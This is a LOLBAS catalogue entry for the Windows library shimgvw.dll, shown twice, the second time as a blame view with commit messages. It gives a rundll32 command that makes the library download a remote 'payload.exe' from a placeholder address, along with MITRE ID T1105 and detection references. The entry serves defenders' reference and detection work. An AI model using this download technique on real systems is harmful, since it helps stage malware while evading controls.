LOLBAS/yml/OSLibraries/Shimgvw.yml

---
Name: Shimgvw.dll
Description: Photo Gallery Viewer
Author: Eral4m
Created: 2021-01-06
Commands:
  - Command: rundll32.exe c:\Windows\System32\shimgvw.dll,ImageView_Fullscreen http://x.x.x.x/payload.exe
    Description: Once executed, rundll32.exe will download the file at the URL in the command to INetCache. Can also be used with entrypoint 'ImageView_FullscreenA'.
    Usecase: Download file from remote location.
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Download: INetCache
Full_Path:
  - Path: c:\windows\system32\shimgvw.dll
  - Path: c:\windows\syswow64\shimgvw.dll
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml
  - IOC: Execution of rundll32.exe with 'ImageView_Fullscreen' and a protocol handler ('://') on the command line
Resources:
  - Link: https://twitter.com/eral4m/status/1479080793003671557
Acknowledgement:
  - Person: Eral4m
    Handle: '@eral4m'
Adding scrobj.dll, shimgvw.dll INetCache downloader entries (#189) Co-authored-by: Wietze <wietze@users.noreply.github.com> 2023-08-05 17:50:52 +02:00			`---`
			`Name: Shimgvw.dll`
			`Description: Photo Gallery Viewer`
			`Author: Eral4m`
			`Created: 2021-01-06`
			`Commands:`
			`- Command: rundll32.exe c:\Windows\System32\shimgvw.dll,ImageView_Fullscreen http://x.x.x.x/payload.exe`
Adding tags (closes #9, #318) (#362) * Adding various tags as a first iteration * Adding quotes * Adding 'Custom Format' properly * Updating to key:value pairs * Update template 2024-04-03 17:53:36 +02:00			`Description: Once executed, rundll32.exe will download the file at the URL in the command to INetCache. Can also be used with entrypoint 'ImageView_FullscreenA'.`
Adding scrobj.dll, shimgvw.dll INetCache downloader entries (#189) Co-authored-by: Wietze <wietze@users.noreply.github.com> 2023-08-05 17:50:52 +02:00			`Usecase: Download file from remote location.`
			`Category: Download`
			`Privileges: User`
			`MitreID: T1105`
			`OperatingSystem: Windows 10, Windows 11`
Adding tags (closes #9, #318) (#362) * Adding various tags as a first iteration * Adding quotes * Adding 'Custom Format' properly * Updating to key:value pairs * Update template 2024-04-03 17:53:36 +02:00			`Tags:`
			`- Download: INetCache`
Adding scrobj.dll, shimgvw.dll INetCache downloader entries (#189) Co-authored-by: Wietze <wietze@users.noreply.github.com> 2023-08-05 17:50:52 +02:00			`Full_Path:`
			`- Path: c:\windows\system32\shimgvw.dll`
			`- Path: c:\windows\syswow64\shimgvw.dll`
			`Detection:`
$frack113$ Add Detection Sigma ref (#368) 2024-04-19 19:53:37 +02:00			`- Sigma: https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml`
Adding scrobj.dll, shimgvw.dll INetCache downloader entries (#189) Co-authored-by: Wietze <wietze@users.noreply.github.com> 2023-08-05 17:50:52 +02:00			`- IOC: Execution of rundll32.exe with 'ImageView_Fullscreen' and a protocol handler ('://') on the command line`
			`Resources:`
			`- Link: https://twitter.com/eral4m/status/1479080793003671557`
			`Acknowledgement:`
			`- Person: Eral4m`
			`Handle: '@eral4m'`